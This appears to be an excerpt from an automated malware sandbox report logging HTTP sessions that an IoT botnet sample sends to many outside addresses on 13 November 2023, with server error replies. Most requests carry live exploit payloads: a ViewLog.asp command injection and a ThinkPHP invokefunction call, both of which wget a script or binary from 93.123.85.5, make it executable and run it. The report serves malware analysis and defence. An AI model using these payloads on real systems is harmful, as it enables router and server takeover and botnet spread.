                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Unsupported method</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              977192.168.2.235302262.74.144.1738080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.856084108 CET18990OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:34.053618908 CET19118OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              978192.168.2.234308495.124.34.5880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:33.050097942 CET19001OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:34.546792984 CET19144INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:33 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              979192.168.2.235580095.211.101.17580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.202162981 CET19131OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:34.502753019 CET19143INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:34 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              98192.168.2.235018862.29.126.1328080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.148180962 CET3061OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              980192.168.2.234158895.86.98.8380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.276087046 CET19135OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              981192.168.2.233398831.136.94.638080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.287801981 CET19136OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:35.297147989 CET19271OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:37.312849045 CET19502OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.536261082 CET20008OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:49.727233887 CET20674OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:05.853151083 CET20701OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              982192.168.2.233527294.123.252.358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.299448013 CET19137OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              983192.168.2.235401094.237.53.1258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.542260885 CET19144OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              984192.168.2.235065894.130.153.1568080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.558990955 CET19145OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:34.864573956 CET19238INHTTP/1.1 404 Not Found
                                                              Server: Apache-Coyote/1.1
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 989
                                                              Date: Mon, 13 Nov 2023 21:20:34 GMT
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 38 32 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 38 32 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.82 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.82</h3></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              985192.168.2.235913631.136.202.2168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.615770102 CET19146OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:35.617059946 CET19276OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:37.600806952 CET19514OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.792346001 CET20045OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:49.727207899 CET20673OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:05.597203970 CET20700OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              986192.168.2.235942831.136.79.878080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:34.616776943 CET19147OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:35.617059946 CET19276OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:37.600806952 CET19515OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
